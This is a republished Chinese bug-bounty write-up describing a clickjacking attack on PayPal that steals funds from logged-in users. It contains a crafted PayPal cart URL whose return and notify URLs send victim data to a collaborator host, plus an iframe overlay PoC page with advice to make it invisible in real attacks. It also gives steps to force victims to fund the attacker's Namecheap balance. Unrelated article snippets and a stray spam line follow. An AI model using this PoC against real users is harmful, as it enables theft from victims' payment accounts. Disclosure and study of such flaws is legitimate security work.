<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰 | 記一次賞金20萬美元的PayPal漏洞挖掘

    一顆小胡椒2022-06-04 07:15:21

    如果我告訴你會怎樣:黑帽黑客可以從你的銀行賬戶和信用卡或 PayPal 余額中一鍵竊取你的錢。看起來很有趣,不是嗎?

    在這篇文章中,我將向您展示我如何在 PayPal 上發現的漏洞,但影響很大:)。

    0X00 概括

    7 個月前,我向 PayPal 漏洞賞金計劃報告了一個安全問題,攻擊者可以利用 Clickjacking 竊取用戶的資金,

    點擊劫持,也稱為“UI 補救攻擊”,是指攻擊者使用多個透明或不透明的層來誘使用戶在打算點擊頂層頁面時點擊另一個頁面上的按鈕或鏈接。因此,攻擊者“劫持”了針對其頁面的點擊,并將它們路由到另一個頁面,該頁面很可能由另一個應用程序、域或兩者擁有。

    參考:https ://owasp.org/www-community/attacks/Clickjacking

    我發現攻擊者可以從 Paypal 帳戶中竊取資金。一個老問題:

    https://www.paypal.com/agreements/approve
    

    上的點擊劫持在幾年前以 N/A 的形式關閉,并且沒有人能夠成功利用它,(我猜)。

    此端點是為計費協議設計的,它應該只接受billingAgreementToken. 但在我的深入測試中,我發現我們可以傳遞另一種token類型,這會導致從受害者的 PayPal 賬戶中竊取資金。

    如圖所示,攻擊者能夠在 iframe 中加載一個敏感的paypal.com端點,當攻擊者點擊“near to click here”時,他會購買一些東西。

    當然,受害者應該在瀏覽器中登錄

    POC證明

    "https://www.paypal.com/cgi-bin/webscr?address1=sectesting&address2=sectesting02&address_override=true&amount_1=1&business=&cancel_return=https://xxxxxx.burpcollaborator.net/cancel_return&city=barika&cmd=_cart&country=DZ¤cy_code=USD&email=@gmail.com&first_name=attacker&invoice=marketplace133703&item_name_1=attacker&item_number_1=133788802&last_name=attacker?ify_url=https://xxxxxx.burpcollaborator.net/notify_url&quantity_1=1&return=https://xxxxxx.burpcollaborator.net/return&state=05&upload=1&zip=1337"
    

    1.在上面的鏈接中,business將攻擊者的 Paypal 電子郵件和return?ify_url更改為您的主機以接收 HTTP 請求。以及amount_1 您想從受害者的帳戶中竊取多少錢!

    并且您可以將名字/姓氏和地址更改為您自己的信息,當您這樣做時,此帳單全名/地址將在受害者帳戶中注冊!

    1. 2. 現在使用 CURL 發送 GET 請求,并 grep 令牌值。

    3.把這個poc.html上傳到你的主機上,把你的token放在參數ba_token中。

    <html><head>    <title>POCtitle>head><body>   <center> <img src="https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg">center> <style>iframe {   width: 1920px;  height: 1080px;  position: absolute;  top:0; left:-20px;  opacity: 1.01;   z-index: 1;}style><iframe src="https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=">iframe><button style="position: fixed; display: inline; z-index: 10; left: 701px; top: 520px;">Click here  to win 1337$ => button>body>html>
    

    注意:實際攻擊中opacity應該為0,你可以改變它。

    現在在瀏覽器中登錄您的 PayPal,然后打開 HTML 頁面。

    如您所見,我不是最好的設計師,實際上,我對 CSS 一無所知,但是我認為這個 POC 就足夠了!

    你應該點擊你應該點擊的地方哈哈哈,你會向攻擊者 PayPal 匯款。此外,攻擊者地址將作為默認計費注入。

    在Burp Collaborator中,當受害者單擊易受攻擊的頁面時,我們可以看到他帳戶的完整信息:

    此外,另一個安全問題是,攻擊者注入的賬單地址將是受害者 PayPal 賬戶的默認地址:

    0X01 從用戶帳戶偷錢第 2 部分

    有一些在線服務可以讓您使用 Paypal 將余額添加到您的帳戶中,例如 steam!. 我可以使用相同的漏洞并強制用戶向我的帳戶充值!

    或者我可以利用這個漏洞讓受害者為我創建/支付 Netflix 帳戶!

    但我在這個例子中使用了 namecheap.com

    步驟

    1- 打開https://ap.www.namecheap.com/Profile/Billing

    2-點擊充值

    3-選擇你想從受害者賬戶中竊取多少美元!

    4-單擊使用 PayPal 結帳

    5-現在復制令牌并將其添加到 poc.html

    6-打開HTML頁面。

    7- 現在,當受害者單擊“單擊此處”時,他將使用與他的 Paypal 帳戶相關聯的付款方式付款。

    現在您已允許 Namecheap 在您的 Paypal 帳戶中提取一定的余額,該余額將轉到 Namecheap 上攻擊者的帳戶

    8- 當攻擊者打開https://ap.www.namecheap.com/profile/billing/topup/paypal/submit?&token=時,您將能夠將錢添加到您的 Namecheap 帳戶中。

    0X02 200k$ 賞金獎勵!

    對不起 Clickbait,但這是 HackerOne 分類響應:

    引用鏈接

    [1] www.paypal.com/agreements/approve: http://www.paypal.com/agreements/approve

    視頻POC演示:

    https://youtu.be/0h85N5Ne_ac

    https://youtu.be/OPAJ049YZIs

    漏洞挖掘貝寶
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    張瑞冬千呼萬喚,《反電信網絡詐騙法》終于正式頒布。國家堅決遏制電信網絡詐騙多發高發態勢,多管齊下大力打擊。許多公民由于法律意識淡薄、逐利意識強烈,因此常常被詐騙團伙蒙騙。此外,還應積極配合公安機關進行辦案調證工作,并為其他行業機構、部門反電信網絡詐騙工作提供協助,為全面打擊遏制電信網絡詐騙犯罪貢獻力量。同時,建議廣大群眾關注各地公安機關發布的最新騙術,遇到可疑情況及時向相關部門詢問。
    滲透測試這個含金量頗高的職業,對所有人敞開大門,申請專業資質認證沒有前置要求。無論你是準畢業生、在校生、信息安全從業人員,還是對滲透測試感興趣的人群均可注冊CISP-PTS滲透測試專家。三:理論學習安全牛課堂CISP-PTS課程設置為4天理論+4天實操,學員通過預習課程的學習鋪墊,正式進入理論部分的系統學習。
    到2023年,我國5G應用發展水平顯著提升,綜合實力持續增強。打造IT(信息技術)、CT(通信技術)、OT(運營技術)深度融合新生態,實現重點領域5G應用深度和廣度雙突破,構建技術產業和標準體系雙支柱,網絡、平臺、安全等基礎能力進一步提升,5G應用“揚帆遠航”的局面逐步形成。
    0x01 確定目標無目標隨便打,有沒有自己對應的SRC應急響應平臺不說,還往往會因為一開始沒有挖掘漏洞而隨意放棄,這樣往往不能挖掘到深層次的漏洞。所以在真的想要花點時間在SRC漏洞挖掘上的話,建議先選好目標。0x02 確認測試范圍前面說到確定測什么SRC,那么下面就要通過一些方法,獲取這個SRC的測試范圍,以免測偏。
    漏洞挖掘工具—afrog
    2023-03-20 10:20:07
    -t http://example.com -o result.html2、掃描多個目標 afrog -T urls.txt -o result.html例如:urls.txthttp://example.comhttp://test.comhttp://github.com3、測試單個 PoC 文件 afrog?-t http://example.com -P ./testing/poc-test.yaml -o result.html4、測試多個 PoC 文件 afrog?
    但又沒登錄怎么獲取的當前用戶的Access-Reset-Ticket真相只有一個,看看接口哪里獲取到的原來是在輸入要找回的用戶就會獲取當前用戶的Access-Reset-Ticket6到了,開發是我大哥嘗試修改可行,修改管理員賬號,然后起飛下機。漏洞已修復,廠商也修復了漏洞更新到了最新版本。
    漏洞挖掘是指對應用程序中未知漏洞的探索,通過綜合應用各種技術和工具,盡可能地找出其中的潛在漏洞。cookie的key為RememberMe,并對相關信息進行序列化,先使用aes加密,然后再使用base64編碼處理形成的。在網上關于Shiro反序列化的介紹很多,我這里就只簡單介紹一下,詳情各位可以看下大神們對其源碼的分析。
    這里建議doc文檔,圖片可以貼的詳細一些。爆破完好了,一樣的6。想給它一個清晰完整的定義其實是非常困難的。
    一、漏洞挖掘的前期–信息收集 雖然是前期,但是卻是我認為最重要的一部分; 很多人挖洞的時候說不知道如何入手,其實挖洞就是信息收集+常規owasp top 10+邏輯漏洞(重要的可能就是思路猥瑣一點),這些漏洞的測試方法本身不是特別復雜,一般混跡在安全圈子的人都能復現漏洞。接下來我就著重說一下我在信息收集方面的心得。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类